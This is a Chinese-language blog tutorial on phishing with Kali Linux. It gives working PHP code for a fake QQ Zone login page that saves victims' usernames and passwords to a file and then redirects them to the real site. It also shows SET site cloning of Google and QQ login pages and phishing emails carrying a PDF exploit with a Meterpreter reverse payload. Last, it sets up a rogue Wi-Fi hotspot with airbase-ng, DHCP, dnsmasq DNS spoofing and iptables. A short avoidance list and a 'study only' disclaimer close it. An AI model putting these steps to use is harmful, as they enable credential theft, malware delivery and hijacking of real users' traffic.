文章详情
黑客中间人攻击实例讲解,kali搭建钓鱼热点
注:文章内容仅供参考学习,任何人不得用于非法测试。请遵守国家法律,做一个守法的良好公民。0x00 服务器端搭建的钓鱼页面
这种钓鱼页面,较为常见,攻击者注册与相关网站类似的域名,然后利用该网站的主页或登录页面进行诱骗,引诱被攻击者输入账号密码等个人信息。
这里利用手里闲置的阿里的一台服务器给大家做一下演示,构造一个简单的手机端钓鱼页面。
先来看一下后端的主要代码:
<?php if (isset($_POST["user"])) { if (isset($_POST["pass"])) { $myfile = fopen("fish.txt", "a") or die("Unable to open file!"); $txt = "账号".$_POST["user"]." 密码".$_POST["pass"]; fwrite($myfile, $txt); fclose($myfile); //在这里他完成输入之后进行跳转 echo '<script>window.location.href="http://qzone.qq.com/"; </script>';//echo是输出函数,可以输出文本或者变量 } } ?>
可以看到在被攻击者输入账号密码以后,信息被提交到同目录下的 fish.txt 中,然后进行网站的跳转,跳转到真实的 qq 空间页面。

该页面的第一个选项是没有用的,用户只能点击第二个选项,然后跳转到如下页面

在手机端是看不出什么异常的,但是我们用电脑打开看看。

在电脑端打开的网站,url 地址显示的是该钓鱼页面搭建的服务器域名和地址。
如果在这里我们输入了账号和密码,信息就会到 fist.txt 中。
而且如果你的手机有qq空间app的客户端,不管你输入什么,都是会直接跳转到你的空间的,在你没觉得有什么事情发生时,你的信息就已经泄露了。


x01 用 kali set 生成的钓鱼网站
这里我们先来利用 社会工程学工具包 SET 中自带的模块来生成 goole 的钓鱼页面。



生成以后我们访问该 ip 地址,可以看到是 goole 的登录页面,而且这个时候 kali 接受到一条访问 ip 的信息,我们尝试输入信息,点击登录,kail中就可以直接得到信息。


在倒数第二步我们选择2.site clone ,还可以克隆其它页面。这里我又尝试了去克隆 qq 空间的登录页面。
不过这里我发现在你 qq 登录的情况下,钓鱼页面会直接进入真正的 qq 空间的登录页面,而且如果你使用快捷登录的方式或者扫码登录的方式,信息是不会被监听到的。
0x02 用 kali set 发送钓鱼邮件
这里我们尝试构造一个利用了 Adobe PDF 的 Collab.collectEmailInfo(堆溢出攻击) 漏洞,然后默认将 Metasploit 中的 Meterpreter 反向攻击荷载记载到 PDF 文件中,假如目标机中安装有 Adobe Acrobat ,且存在该漏洞,我们就可以在对方打开文件时,钓鱼成功。
下面是具体操作:





163邮箱的 SMTP 服务授权码设置见下:

邮件发送成功就像这样。

但是,这个测试的时候,生成的带有 Payload 的附件,有时候会被检测出来。我们来查看这个报错返回了什么,报错状态码为 554,我们查看后面的链接可以看到是因为附件被163检测出来了。


0x04 利用钓鱼热点钓鱼
这次我们利用 kali 和一个无线网卡,来构造一个钓鱼热点,本地搭建 DNS 服务,修改 DNS 服务配置来欺骗受害者。
将 kali 与物理机进行桥接,与物理机在一个网段,然后插入无线网卡。

因为要启动 dhcp 服务,我们先给虚拟网卡 eth0 设置一个静态 ip 地址,
gedit /etc/network/interfaces iface eth0 inet static //说明静态配置 auto eth0 //指定网卡 address 192.168.43.76 //配置静态ip netmask 255.255.255.0 //子网掩码 gateway 192.168.43.1 //网关
重启 kali 的网络。之后我们将网卡 wlan0 设置为监听模式
ifconfig wlan0 down iwconfig wlan0 mode monitor ifconfig wlan0 up

接下来我们使用命令airbase-ng -e CICO -c 11 wlan0mon去创建 WIFI 。

保持该进程,重新打开一个终端,配置 wifi 网关。
ifconfig at0 up //启动新建的 at0 虚拟网卡 gedit /etc/network/interfaces auto at0 iface at0 inet static address 192.168.1.1 netmask 255.255.255.0
重启 kali 的网络,可以看到 at0 已经有 ip 地址了。

接下来我们再来安装配置 dhcp 服务,没有该服务,手机无法连接钓鱼 wifi。
安装以后,我们设置一下网段,子网掩码,网关地址,默认 dns 服务器地址,配置如下:
gedit /etc/dhcp/dhcpd.conf subnet 192.168.1.0 netmask 255.255.255.0 { range 192.168.1.100 192.168.1.150; option routers 192.168.1.1; option subnet-mask 255.255.255.0; option domain-name-servers 192.168.43.76; } 将 at0 指定为 dhcp 的网卡。 gedit /etc/default/isc-dhcp-server INTERFACESv4='at0'

重新启动 dhcp 服务。
下面我们来配置最重要的地方,就是 dns 服务,以 dnsmasq 为例,具体配置大家可以参考这篇文章。
https://sp4rkw.blog.csdn.net/article/details/101681716
我们之所以可以用该热点钓鱼成功就在于 dns 服务的配置,安装以后我们进行如下配置:
gedit /etc/dnsmasq.conf resolv-file=/etc/resolv.conf strict-order listen-address=192.168.43.76 address=/baidu.com/47.**.**.** //将域名解析到如下地址,该例中我尝试将baidu.com的域名解析到我自己的服务器下。 server=8.8.8.8 server=114.114.114.114

重启 dnsmasq 服务。
打开 linux 内核的转发模块,并用 iptables 进行规制编写,命令如下:
echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -j SNAT --to 192.168.43.76
这里我们就完成了钓鱼热点的搭建,连上热点的手机访问百度的域名都会被解析到我的服务器地址......
0x05 避免钓鱼方法总结
(1.)不要随意连公共的 WIFI 网络。
(2.)涉及到账户,密码等个人信息的提交登录时,确保网络环境可信。
(3.)尽量不使用账号密码的登录方式登录。
(4.)垃圾或者来历不明的邮件附件不要查看。
(5.)别相信绝对安全。
注:文章内容仅供参考学习,任何人不得用于非法测试。请遵守国家法律,做一个守法的良好公民。
上一文章:黑客常用的5个攻击手段方法,你知道哪个?
下一文章:国外黑客最常使用的5大黑客工具
相关推荐
- 01-11渗透测试七个步骤,简述渗透测试的一般流程
- 10-28中国网络安全现状,我国当前网路安全现状分析
- 06-10摆脱束缚,在云端处理PDF文件!
- 04-24域名是什么?域名系统功能详细介绍
- 05-02孩子多大学编程比较好?编程课适合多大孩子学
- 09-17如何获得webshell,能直接获取到webshell的方
- 06-03怎么样可以提高手机的运行速度?
- 05-07黑客是怎么赚钱的?黑客赚钱方法
- 03-12QQ密码破解器背后隐藏的骗局
- 02-25「本站活动」签到免费领会员,直播课程!
- 05-06黑客是如何炼成的(自学黑客4大知识点)
- 04-21QQ密码暴力破解器是真的假的?
- 05-24在互联网上如何保证自身权益?
- 10-08计算机网络:常见的网络攻击方式!黑客惯用的